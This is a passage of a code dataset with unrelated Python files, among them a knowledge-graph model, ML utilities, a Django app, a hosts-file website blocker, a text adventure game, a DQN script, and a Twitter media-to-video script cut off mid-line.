loss\n\n \"\"\"\n Prediction function in testing\n \"\"\"\n def predict(self, triplet, s_hist, o_hist):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n t = triplet[3].cpu()\n\n if self.latest_time != t:\n for rr in range(self.num_rels):\n for ee in range(self.in_dim):\n if len(self.s_his_cache[ee][rr]) != 0:\n if len(self.s_hist_test[ee][rr]) >= self.seq_len:\n self.s_hist_test[ee][rr].pop(0)\n self.s_hist_test[ee][rr].append(self.s_his_cache[ee][rr].clone())\n self.s_his_cache[ee][rr] = []\n if len(self.o_his_cache[ee][rr]) != 0:\n if len(self.o_hist_test[ee][rr]) >= self.seq_len:\n self.o_hist_test[ee][rr].pop(0)\n self.o_hist_test[ee][rr].append(self.o_his_cache[ee][rr].clone())\n\n self.o_his_cache[ee][rr] = []\n self.latest_time = t\n\n # If there is no history\n if len(s_hist) == 0:\n s_h = torch.zeros(self.h_dim).cuda()\n else:\n if len(self.s_hist_test[s][r]) == 0:\n self.s_hist_test[s][r] = s_hist.copy()\n s_history = self.s_hist_test[s][r]\n inp = self.aggregator_s.predict(s_history, s, r, self.ent_embeds, self.rel_embeds)\n tt, s_h = self.sub_encoder(inp.view(1, len(s_history), 3 * self.h_dim))\n s_h = s_h.squeeze()\n \n if len(o_hist) == 0:\n o_h = torch.zeros(self.h_dim).cuda()\n else:\n if len(self.o_hist_test[o][r]) == 0:\n self.o_hist_test[o][r] = o_hist.copy()\n o_history = self.o_hist_test[o][r]\n inp = self.aggregator_o.predict(o_history, o, r, self.ent_embeds, self.rel_embeds)\n tt, o_h = self.ob_encoder(inp.view(1, len(o_history), 3 * self.h_dim))\n o_h = o_h.squeeze()\n\n ob_pred = self.linear_sub(torch.cat((self.ent_embeds[s], s_h, self.rel_embeds[r]), dim=0))\n sub_pred = self.linear_ob(torch.cat((self.ent_embeds[o], o_h, self.rel_embeds[r]), dim=0))\n\n tt, o_candidate = torch.topk(ob_pred, self.seq_len)\n tt, s_candidate = torch.topk(sub_pred, self.seq_len)\n if len(self.s_his_cache[s][r]) == 0:\n self.s_his_cache[s][r] = o_candidate\n if len(self.o_his_cache[o][r]) == 0:\n self.o_his_cache[o][r] = s_candidate\n\n loss_sub = self.criterion(ob_pred.view(1, -1), o.view(-1))\n loss_ob = self.criterion(sub_pred.view(1, -1), s.view(-1))\n\n loss = loss_sub + loss_ob\n\n return loss, sub_pred, ob_pred\n\n\n def evaluate(self, triplet, s_hist, o_hist):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n\n loss, sub_pred, ob_pred = self.predict(triplet, s_hist, o_hist)\n o_label = o\n s_label = s\n ob_pred_comp1 = (ob_pred > ob_pred[o_label]).data.cpu().numpy()\n ob_pred_comp2 = (ob_pred == ob_pred[o_label]).data.cpu().numpy()\n rank_ob = np.sum(ob_pred_comp1) + ((np.sum(ob_pred_comp2) - 1.0) / 2) + 1\n\n sub_pred_comp1 = (sub_pred > sub_pred[s_label]).data.cpu().numpy()\n sub_pred_comp2 = (sub_pred == sub_pred[s_label]).data.cpu().numpy()\n rank_sub = np.sum(sub_pred_comp1) + ((np.sum(sub_pred_comp2) - 1.0) / 2) + 1\n\n return np.array([rank_sub, rank_ob]), loss\n\n\n def evaluate_filter(self, triplet, s_hist, o_hist, all_triplets):\n s = triplet[0]\n r = triplet[1]\n o = triplet[2]\n loss, sub_pred, ob_pred = self.predict(triplet, s_hist, o_hist)\n o_label = o\n s_label = s\n sub_pred = F.sigmoid(sub_pred)\n ob_pred = F.sigmoid(ob_pred)\n\n ground = ob_pred[o].clone()\n\n s_id = torch.nonzero(all_triplets[:, 0] == s).view(-1)\n idx = torch.nonzero(all_triplets[s_id, 1] == r).view(-1)\n idx = s_id[idx]\n idx = all_triplets[idx, 2]\n ob_pred[idx] = 0\n ob_pred[o_label] = ground\n\n ob_pred_comp1 = (ob_pred > ground).data.cpu().numpy()\n ob_pred_comp2 = (ob_pred == ground).data.cpu().numpy()\n rank_ob = np.sum(ob_pred_comp1) + ((np.sum(ob_pred_comp2) - 1.0) / 2) + 1\n\n ground = sub_pred[s].clone()\n\n o_id = torch.nonzero(all_triplets[:, 2] == o).view(-1)\n idx = torch.nonzero(all_triplets[o_id, 1] == r).view(-1)\n idx = o_id[idx]\n idx = all_triplets[idx, 0]\n sub_pred[idx] = 0\n sub_pred[s_label] = ground\n\n sub_pred_comp1 = (sub_pred > ground).data.cpu().numpy()\n sub_pred_comp2 = (sub_pred == ground).data.cpu().numpy()\n rank_sub = np.sum(sub_pred_comp1) + ((np.sum(sub_pred_comp2) - 1.0) / 2) + 1\n return np.array([rank_sub, rank_ob]), loss\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"586682083","text":"# -*- coding: utf-8 -*-\r\n'''\r\nLibrary containing useful functions for cross validation\r\n@author: bharback\r\n'''\r\n\r\nimport numpy as np\r\nimport scipy.sparse as spa\r\n\r\ndef model_cross_validation(model, X: spa.csr_matrix , Y: spa.csr_matrix, folds,\r\n verbose = False):\r\n '''Performs cross validation on the folds specified by folds, which should\r\n be defined using sklearn. Returns an array containing the accuracies computed\r\n on each fold. Verbose toggles a printed message after completed folds'''\r\n kfolds = len(folds)\r\n train_performance, validation_performance = np.empty(kfolds), np.empty(kfolds)\r\n for i in range(kfolds):\r\n train, validation = folds[i]\r\n X_train, Y_train = X[train], Y[train]\r\n X_validation, Y_validation = X[validation], Y[validation]\r\n model.fit(X_train,Y_train)\r\n train_accuracy = np.average(model.predict(X_train) == Y_train)\r\n validation_accuracy = np.average(model.predict(X_validation) == Y_validation)\r\n train_performance[i] = train_accuracy\r\n validation_performance[i] = validation_accuracy\r\n if verbose:\r\n print(\"Fold number {} completed.\".format(i))\r\n return np.array(train_performance),np.array(validation_performance)\r\n","sub_path":"LIB_CrossValidation.py","file_name":"LIB_CrossValidation.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146206260","text":"# -*- coding: UTF-8 -*-\n'''\nCreated on 2020/11/18 17:54\n@File : get_add_punctuation_compare.py\n@author: ZL\n@Desc :廖老师需求:在意图和相似度中,随意给句子断句,加入标点符号,查看句子是否相似,或者句子意图是否发生变化\n 标点符号有://匹配这些中文标点符号 。 ? ! , 、 ; : “ ” ‘ ' ( ) 《 》 〈 〉 【 】 『 』 「 」 ﹃ ﹄ 〔 〕 … — ~ ﹏ ¥\n'''\n\nimport random\nfrom commonfunc.change_data_type import ChangeDataType\nimport os\nimport requests\nimport pandas\nfrom tqdm import tqdm\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n\n\nclass GetAddPunctuationCompare:\n\n def get_add_punctuation(self, sentence):\n punctuation = [\"。\", \"?\", \"!\", \",\", \"、\", \";\", \":\", \"“\", \"”\", \"‘\", \"(\", \")\", \"《\", \"》\", \"〈\", \"〉\", \"【\", \"】\", \"『\",\n \"』\", \"「\", \"」\", \"﹃\", \"﹄\", \"〔\", \"〕\", \"…\", \"—\", \"~\", \"﹏\", \"¥\"]\n sentence_list = list(sentence)\n sentence_list.insert(random.randint(0, len(sentence_list) - 1), random.choice(punctuation))\n return \"\".join(sentence_list)\n\n def get_similar_compare(self, url, test_file, result_file):\n test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\comparedata\\\\\" + test_file)\n sentence_list = test_data.sentence.tolist()\n str1_list, str2_list, result_score_list, origin_score_list = [], [], [], []\n for j in tqdm(sentence_list):\n str1 = j\n str2 = GetAddPunctuationCompare.get_add_punctuation(self, j)\n params = {\n \"str1\": str1,\n \"str2\": str2,\n \"model\": \"Siamese\"\n }\n try:\n result = requests.get(url=url, params=params).json()\n threshold = result[\"sim_score\"]\n if threshold >= 0.742:\n result_score_list.append(1)\n else:\n result_score_list.append(0)\n\n str1_list.append(str1)\n str2_list.append(str2)\n origin_score_list.append(threshold)\n except Exception as e:\n print(j)\n print(e)\n result_data = pandas.DataFrame({\"str1\": str1_list, \"str2\": str2_list, \"origin_score\": origin_score_list,\n \"result_score\": result_score_list})\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\punctuation_compare\\\\\" + result_file)\n\n def get_intention_compare(self, url, test_file, result_file):\n test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\comparedata\\\\\" + test_file)\n sentence_list = test_data.sentence.tolist()\n str1_list, str2_list, intention1_list, intention2_list, tf_list = [], [], [], [], []\n for j in tqdm(sentence_list):\n str1 = j\n str2 = GetAddPunctuationCompare.get_add_punctuation(self, j)\n params1 = {\n \"utterance\": str1\n }\n params2 = {\n \"utterance\": str2\n }\n try:\n result1 = requests.get(url=url, params=params1).json()\n result2 = requests.get(url=url, params=params2).json()\n intention1 = result1[\"data\"][\"intent\"]\n intention2 = result2[\"data\"][\"intent\"]\n\n str1_list.append(str1)\n str2_list.append(str2)\n intention1_list.append(intention1)\n intention2_list.append(intention2)\n tf_list.append(intention1 == intention2)\n except Exception as e:\n print(j)\n print(e)\n result_data = pandas.DataFrame(\n {\"sentence1\": str1_list, \"sentence2\": str2_list, \"intention1\": intention1_list,\n \"intention\": intention2_list, \"tf\": tf_list})\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\punctuation_compare\\\\\" + result_file)\n\n\nif __name__ == '__main__':\n # GetAddPunctuationCompare().get_similar_compare(\"http://192.168.1.79:8234/bert_similarity/v2\", \"similar_test.csv\",\n # \"punctuation_compare_similar_result.csv\")\n # http://192.168.26.105:30202/intention/v2/common\n GetAddPunctuationCompare().get_intention_compare(\"http://192.168.26.105:30202/intention/v2/common\",\n \"intention_test.csv\",\n \"punctuation_compare_intention_result.csv\")\n","sub_path":"api/get_add_punctuation_compare.py","file_name":"get_add_punctuation_compare.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239474643","text":"from tests import BaseCase\nfrom google.appengine.ext import ndb\nfrom rest import utils\nimport mock\n\n\nclass RestUtilsBaseCase(BaseCase):\n pass\n\n\n@mock.patch('base64.urlsafe_b64encode')\nclass GetResourceIdTestCase(RestUtilsBaseCase):\n\n def test_single_pair(self, m_encode):\n key = ndb.Key('Parent', 123)\n utils.get_resource_id_from_key(key)\n m_encode.assert_called_once_with(u'Parent\\x1e\\x1f123')\n\n def test_multiple_pair(self, m_encode):\n key = ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o')\n utils.get_resource_id_from_key(key)\n m_encode.assert_called_once_with(u'Parent\\x1e\\x1f123\\x1eChild\\x1eel-ni\\\\u2099o')\n\n\nclass GetResourceIdIntegrationCase(RestUtilsBaseCase):\n\n def test_single_pair(self):\n key = ndb.Key('Parent', 123)\n result = utils.get_resource_id_from_key(key)\n self.assertEqual(result, 'UGFyZW50Hh8xMjM')\n\n def test_multiple_pair(self):\n key = ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o')\n result = utils.get_resource_id_from_key(key)\n self.assertEqual(result, 'UGFyZW50Hh8xMjMeQ2hpbGQeZWwtbmlcdTIwOTlv')\n\n\nclass GetKeyFromResource(RestUtilsBaseCase):\n\n def test_base_case(self):\n \"\"\"\n Test general conversion including int ids\n \"\"\"\n\n result = utils.get_key_from_resource_id('UGFyZW50Hh8xMjMeQ2hpbGQeZWwtbmlcdTIwOTlv')\n self.assertEqual(result, ndb.Key('Parent', 123, 'Child', 'el-ni\\u2099o'))\n\n def test_get_triple(self):\n \"\"\"\n Additional Test Case to ensure that we can do more than 3 pairs\n \"\"\"\n\n result = utils.get_key_from_resource_id('UGFyZW50Hh8xMjMeQ2hpbGQeHzQ1Nh5HcmFuZB4fNzg5')\n self.assertEqual(result, ndb.Key('Parent', 123, 'Child', 456, 'Grand', 789))\n","sub_path":"tests/rest/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303632027","text":"one = 3\ntwo = 3\nthree = 5\nfour = 4\nfive = 4\nsix = 3\nseven = 5\neight = 5\nnine = 4\nten = 3\neleven = 6\ntwelve = 6\nthirteen = 8\nfourteen = 8\nfifteen = 7\nsixteen = 7\nseventeen = 9\neighteen = 8\nnineteen = 8\ntwenty = 6\nthirty = 6\nforty = 5\nfifty = 5\nsixty = 5\nseventy = 7\neighty = 6\nninety = 6\nhundred = 7\nthousand = 8\nandd = 3\n\n#stevilo crk je:\n\nrezultat_do_100 = (one + two + three + four + five + six + seven + eight + nine) * 9 +\\\n ten + eleven + twelve + thirteen + fourteen + fifteen + sixteen + seventeen + eighteen + nineteen +\\\n (twenty + thirty + forty + fifty + sixty + seventy + eighty + ninety) * 10\n\nrezultat_do_1000 = (one + two + three + four + five + six + seven + eight + nine) * 100 + andd * 99 * 9 +\\\n one + thousand + rezultat_do_100 * 10 + hundred * (999 - 99)\n\n\nprint(rezultat_do_1000)","sub_path":"project_euler_17.py","file_name":"project_euler_17.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"109093925","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^inventory/', include('inventory.urls', namespace='inventory')),\n url(r'^announcements/', include('announcements.urls', namespace='announcements')),\n url(r'^users/', include('users.urls', namespace='users')),\n url(r'^stocktaking/', include('stocktaking.urls', namespace='stocktaking')),\n url(r'', include('panel.urls', namespace='panel')),\n\n]\n","sub_path":"control/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"116504560","text":"\"\"\" How Many Numbers Are Smaller Than the Current Number\n\n\nGiven the array nums, for each nums[i] find out how many numbers\n in the array are smaller than it. That is, for each nums[i] you\n have to count the number of valid j's such that j != i and nums[j] < nums[i].\n\nReturn the answer in an array.\"\"\"\n\n\ndef smallerNumbersThanCurrent(nums):\n # [8,3,2,2,1]\n\n sorted_num = sorted(nums, reverse=True)\n dacount = { }\n for i in range(len(sorted_num) - 1):\n if sorted_num[ i ] > sorted_num[ i + 1 ]:\n dacount[ sorted_num[ i ] ] = len(sorted_num) - (i + 1)\n dacount[ sorted_num[ -1 ] ] = 0\n\n output = [ ]\n for num in nums:\n output.append(dacount[ num ])\n\n return output\n\n\nprint(smallerNumbersThanCurrent([ 8, 4, 5, 3, 3, 2, 2, 2, 1 ]))\n","sub_path":"smallernums.py","file_name":"smallernums.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"33276378","text":"import serial\nfrom vpython import *\n\narduinoSerialData = serial.Serial('/dev/ttyACM0', 9600) #create an object to read the serial port\nmeasuringRod = cylinder( lenght=6, color=color.yellow, radius=.5, pos=(-3,0,0))\n\nwhile (1 == 1): #loop forever\n\trate(20)\n\tif (arduinoSerialData.inWaiting()>0): #Check to see if data is on serial port\n\t\tmyData = arduinoSerialData.readline() #If data is there, then read it\n\t\tdistance = float(myData) #Convert string myData to floating point number and hold in distance variable\n\t\tprint (distance)\n\t\tmeasuringRod.length=distance\n\n","sub_path":"ultra/ultrassom.py","file_name":"ultrassom.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"289567631","text":"from sys import exit\nimport combat\n\nclass Scene(object):\n\t\n\tdef enter(self):\n\t\tprint (\"This scene hasn't been written yet\")\n\t\treturn Bar()\n\nclass Choice(object):\n\n\tdef __init__(self, possible_answers, responses):\n\t\tself.possible_answers = possible_answers\n\t\tself.responses = responses\n\t\t\n\tdef choice(self):\n\t\n\t\tp_a_index = range(0,len(self.possible_answers)) # possible answer index list\n\t\tp_a_nums = list(map(str,range(1,len(self.possible_answers)+1)))\n\t\n\t\twhile True:\n\t\t\n\t\t\tfor i in p_a_index:\n\t\t\t\tprint (\"%d: %s\" % (i+1, self.possible_answers[i]))\n\t\t\n\t\t\tanswer = input(\"> \")\n\t\t\t\n\t\t\tif answer not in self.possible_answers + p_a_nums:\n\t\t\t\tprint (self.responses[-1])\n\t\t\t\tcontinue\n\t\t\n\t\t\tfor i in p_a_index:\n\t\t\t\n\t\t\t\tif answer == self.possible_answers[i] or answer == p_a_nums[i]:\n\t\t\t\t\tprint (self.responses[i])\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\treturn i + 1\n\t\t\tbreak\n\t\t\t\nclass Death(Scene):\n\t\t\n\tdef enter(self):\n\t\tprint (\"You died.\")\n\t\treturn Bar()\n\t\t\nclass Boring(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You were never cut out to be a hero.\")\n\t\tprint (\"You do nothing noteworthy for the rest of your life and you die\")\n\t\tprint (\"unsatisfied and alone.\")\n\t\treturn Bar()\n\nclass Bar(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You enter a bar\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['order lager','order grog', 'spit at bartender']\n\t\tresponses = ['Boring!',\n\t\t'The drink of a true adventurer! There\\'s someone I think you should meet.',\n\t\t'Death!',\n\t\t'This isn\\'t that kind of bar. Think again']\n\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Boring()\n\t\tif path == 2: return Mystic()\n\t\tif path == 3: return Death()\t\t\n\t\t\nclass Mystic(Scene):\n\n\tdef enter(self):\n\t\tprint (\"There is an old mysterious woman. She looks unimaginably old.\") \n\t\tprint (\"It is said she can read peoples futures.\")\n\t\tprint (\"She asks you: \\\"Tell me child, what path do you seek?\\\"\")\n\t\t\n\t\tpossible_answers = [\"path of peace.\",\"path of truth\",\"path of honour\"]\n\t\tresponses = [\"Ah, perhaps you should grow a pair and pick up a sword?\",\n\t\t\"Truth you seek, I can give you all of the truth. Look into my crystal ball. Look deeper.\",\n\t\t\"Yes! A noble warrior I see inside of you. \\nTake this gem to the Blacksmith, and say the words: \\n\\\"Dawn rises, The Dark retreats, The Light shall shine again,\\\"\",\n\t\t\"The path you seek is not what I see for you. Choose again.\"]\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Boring()\n\t\tif path == 3: return Blacksmith()\n\t\tif path == 2: return Death()\n\t\t\nclass Blacksmith(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You enter a blacksmith\")\n\t\tprint (\"Inside is a drunk old man\")\n\t\tprint (\"What do you say?\")\n\t\t\n\t\tpossible_answers = ['Dawn rises, The Dark retreats, The Light shall shine again',\n\t\t'Uh.. Corn rises, The Bark depletes, The Kite shall shine again?',\n\t\t'You stink of piss and booze, you\\'re a disgusting old man, what use could you be to me?']\n\t\tresponses = [\"Is that? No! It can\\'t be!\\nThe lost ruby from the Mighty Sword of Kanazin\",\n\t\t'Can\\'t you see I\\'m busy, piss off!',\n\t\t'Death!',\n\t\t'You\\'re talking bollocks mate!']\n\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Battle()\n\t\tif path == 2: return Boring()\n\t\tif path == 3: return Death()\n\t\t\nclass Battle(Scene):\n\n\tdef enter(self):\n\t\tprint (\"You here the sound of horses in the town square.\")\n\t\tprint (\"You here the sound of screaming and terror and death\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['Hide','Charge through the door with your mighty sword']\n\t\tresponses = ['You survive, but hundreds of innocent people died because you failed to save them',\n\t\t'You charge through the door and scream \\\"Behold! The Mighty Sword of Kanazin!!!\\\"',\n\t\t'Stop dillydallying, this is the most important decision of your life']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 2: pass\n\t\tif path == 1: return Boring()\n\t\t\n\t\tprint (\"You are quickly surrounded by marauding villains\")\n\t\tprint (\"They are terrifying, wicked and blood-thirsty.\")\n\t\tprint (\"What do you do?\")\n\t\t\n\t\tpossible_answers = ['Swing your mighty sword in one foul swoop']\n\t\tresponses = ['The Mighty Sword decapitates all of the villains, their heads roll across the square, blood pools at your feet.',\n\t\t'Are you really a hero? There\\'s only one real choice!']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: pass\n\t\t\n\t\tprint (\"The leader approaches, he is fully clad in jet black armour, darker than the night itself\")\n\t\tprint (\"He says \\\"Your puny sword will do nothing to me, no man can slay the mighty Black Knight\\\"\")\n\t\tprint (\"What do you do?\")\n\t\tpossible_answers = ['Swing your Mighty Sword anyway', 'Walk away', 'Challenge him to a game of Rock Paper Scissors']\n\t\tresponses = ['The sword bounces off his armour, he crushes your skull in his hand', 'He laughs, and kills everyone you ever loved', 'The Dark Knight never refuses a duel', 'Choose again']\n\t\t\n\t\tpath = Choice(possible_answers, responses).choice()\n\t\tif path == 1: return Death()\n\t\tif path == 2: return Boring()\n\t\tif path == 3: pass\n\t\t\n\t\tprint (\"You say: \\\"Let's make this more interesting\\\"\")\n\t\tprint (\"\\\"Lose 4 times and you die\\\"\")\n\t\tresult = combat.rps()\n\t\t\n\t\tif result == 1: return Death()\n\t\tif result == 2: pass\n\t\t\n\t\tprint (\"You win the game\")\n\t\texit(0)\n\t\t\n\t\t\n\t\t\nclass Engine(object):\n\n\tdef __init__(self, scene):\n\t\tself.scene = scene\n\t\t\n\tdef play(self):\n\t\t\n\t\tcurrent_scene = self.scene\n\t\t\n\t\twhile True:\n\t\t\n\t\t\tnew_scene = current_scene.enter()\n\t\t\tcurrent_scene = new_scene\n\t\t\n\t\t\n\t\t\nscene = Bar()\ngame = Engine(scene)\ngame.play()","sub_path":"courage.py","file_name":"courage.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267264816","text":"\r\nimport time\r\nfrom datetime import datetime as dt\r\n\r\nhosts_path=r\"C:\\Windows\\System32\\drivers\\etc\\hosts.ics\"\r\nredirect=\"127.0.0.1\"\r\nwebsite_list=[\"www.instagram.com\",\"www.facebook.com\",\"www.csgo.com\"]\r\nwith open(hosts_path,'r') as file:\r\n content_file=file.read()\r\n file.close()\r\nwhile 1:\r\n if (dt(dt.now().year,dt.now().month,dt.now().day,9)=200.0:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n break\n torch.save(agent.qnetwork_local.state_dict(), 'checkpoint' + env_name + '.pth')\n return scores\n\nscores = dqn()\n\n# plot the scores\n# fig = plt.figure()\n# ax = fig.add_subplot(111)\n# plt.plot(np.arange(len(scores)), scores)\n# plt.ylabel('Score')\n# plt.xlabel('Episode #')\n# plt.show()\n\n\n# load the weights from file\nagent.qnetwork_local.load_state_dict(torch.load('checkpoint' + env_name + '.pth'))\nN = 10\nrewardsDQN = np.zeros((N,T))\nfor i in range(N):\n state = env.reset()\n rewards = []\n for step_index in range(T):\n action = agent.act(state)\n env.render()\n time.sleep(0.01)\n state, reward, done, _ = env.step(action.reshape(-1))\n rewardsDQN[i,step_index] = reward\n if done:\n print(\"Finished after iteration: \", step_index)\n break\n\nrewardsDQN = np.mean(rewardsDQN, axis=0)\nenv.close()\n\nplt.plot(np.cumsum(rewardsDQN), color='green', label='DQN Agent trained')\nplt.plot(np.cumsum(rewards), color='red', label='Untrained Agent')\nplt.show()\n","sub_path":"logs/mainDQN.py","file_name":"mainDQN.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118564620","text":"# helper util methods \nimport json \nimport re\n\ndef clean_text(text):\n patterns = [\n \"((http(s)?(\\:\\/\\/))+(www\\.)?([\\w\\-\\.\\/])*(\\.[a-zA-Z]{2,3}\\/?))[^\\s\\b\\n|]*[^.,;:\\?\\!\\@\\^\\$ -]\"\n , \"#\"\n ]\n for pattern in patterns:\n text = re.sub(pattern, \"\", text, flags=re.MULTILINE)\n return text","sub_path":"helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338430781","text":"'''\n\n树控件响应事件\n\n'''\n\nimport sys,math\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QStringListModel\n\n\nclass TreeEvent(QMainWindow):\n def __init__(self):\n super(TreeEvent, self).__init__()\n self.initUI()\n\n def initUI(self):\n self.resize(430, 230)\n self.setWindowTitle(\"树控件响应事件\")\n\n self.tree=QTreeWidget()\n self.tree.setColumnCount(2)\n self.tree.setHeaderLabels(['Key', 'Value'])\n root = QTreeWidgetItem(self.tree)\n root.setText(0, \"root\")\n root.setText(1,'0')\n\n child1=QTreeWidgetItem(root)\n child1.setText(0,'child1')\n child1.setText(1,'1')\n\n child2 = QTreeWidgetItem(root)\n child2.setText(0, 'child2')\n child2.setText(1, '2')\n\n child3 = QTreeWidgetItem(child2)\n child3.setText(0, 'child3')\n child3.setText(1, '3')\n\n self.tree.clicked.connect(self.onTreeClicked)\n self.setCentralWidget(self.tree)\n\n def onTreeClicked(self,index):\n item=self.tree.currentItem()\n print(index.row())\n print('key=%s,value=%s'%(item.text(0),item.text(1)))\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = TreeEvent()\n main.show()\n\n sys.exit(app.exec_())","sub_path":"src/table_tree/TreeEvent.py","file_name":"TreeEvent.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"281142023","text":"from django.db import transaction\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render\n\nfrom products.models import Comments, Product\n\nUser = get_user_model()\nfrom django.contrib.contenttypes.models import ContentType\n\n\ndef get_children(qs_child):\n res = []\n for comment in qs_child:\n c = {\n 'id': comment.id,\n 'text': comment.text,\n 'timestamp': comment.timestamp.strftime('%Y-%m_%d %H:%m'),\n 'author': comment.user.first_name,\n 'is_child': comment.is_child,\n 'parent_id': comment.get_parent\n }\n if comment.children.exists():\n c['children'] = get_children(comment.children.all())\n res.append(c)\n return res\n\n\ndef create_comments_tree(qs):\n res = []\n for comment in qs:\n c = {\n 'id': comment.id,\n 'text': comment.text,\n 'timestamp': comment.timestamp.strftime('%Y-%m_%d %H:%m'),\n 'author': comment.user.first_name,\n 'is_child': comment.is_child,\n 'parent_id': comment.get_parent\n }\n if comment.children:\n c['children'] = get_children(comment.children.all())\n if not comment.is_child:\n res.append(c)\n return res\n\n\n","sub_path":"products/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612463443","text":"import twitter\nimport json\nimport urllib.request\nimport os\nimport subprocess\nfrom google.cloud import videointelligence\nfrom google.oauth2 import service_account\nfrom google.protobuf.json_format import MessageToJson\n\nclass InvalidMediaException(Exception):\n pass\n\nclass InvalidCredentialsException(Exception):\n\tpass\n\ndef get_timeline_media_urls(screen_name, count=200, exclude_replies=True): \n\t\"\"\"Get list of jpg urls found in media associated with tweets from a specific twitter accounts timeline\n\n Args:\n screen_name (str): Twitter screen name associated with desired timeline\n\n Keyword Arguments (optional):\n count (int): Number of tweets to look through (capped at 200 per api limits). Default 200.\n exclude_replies (bool): Exclude media found in tweets where specified user only replied. Default: True\n\n Returns:\n list: All .jpg image urls found in the twitter feed, as strings. \n\n \"\"\"\n\twith open(\"keys.dat\") as f:\n\t\tkeys = f.read().split()\n\ttry:\n\t\tapi = twitter.Api(consumer_key= keys[0],\n\t\t\t\t\tconsumer_secret=keys[1],\n\t\t\t\t\taccess_token_key=keys[2],\n\t\t\t\t\taccess_token_secret=keys[3])\n\texcept:\n\t\traise InvalidCredentialsException(\"Invalid twitter credentials\")\n\n\ttry:\n\t\tres = api.GetUserTimeline(screen_name=screen_name, count=count, trim_user=True, exclude_replies=exclude_replies)\n\texcept Exception as e:\n\t\traise e\n\timages = []\n\tfor tweet in res:\n\t\tjs = tweet._json[\"entities\"]\n\t\tif \"media\" in js.keys():\n\t\t\tfor media in js[\"media\"]:\n\t\t\t\tif media[\"media_url\"][-3:] == \"jpg\":\n\t\t\t\t\timages.append(media[\"media_url\"])\n\tif len(images) == 0:\n\t\traise InvalidMediaException(\"No valid media found for screen_name: \" + screen_name)\n\treturn images\n\ndef urls_to_movie(images, output=\"output.mp4\"):\n\t\"\"\"Generate local mp4 file from a list of urls, with 1 sec per images\n\n Args:\n images (list): List of images to include in movie, as strings\n\n\tKeyword Arguments (optional):\n output: Ouput filename for video. Default: output.mp4\n\n Returns:\n str: Output filename used by ffmpeg, in event provided filename was in use\n\n \"\"\"\n\tcount = 0\n\twhile os.path.isfile(output):\n\t\toutput = output.split(\".\")[0] + \"(\" + str(count) + \").\" + output.split(\".\")[1]\n\t\tcount += 1\n\n\tfor i in range(len(images)):\n\t\ttry:\n\t\t\turllib.request.urlretrieve(images[i], \"tmp_{}.jpg\".format(str(i).zfill(4)))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tfor i in range(len(images)):\n\t\ttry:\n\t\t\tsubprocess.call(('''ffmpeg -loop 1 -i tmp_{}.jpg -c:a libfdk_aac -ar 44100 -ac 2 -vf \"scale='if(gt(a,16/9),1280,-1)':'if(gt(a,16/9),-1,720)', 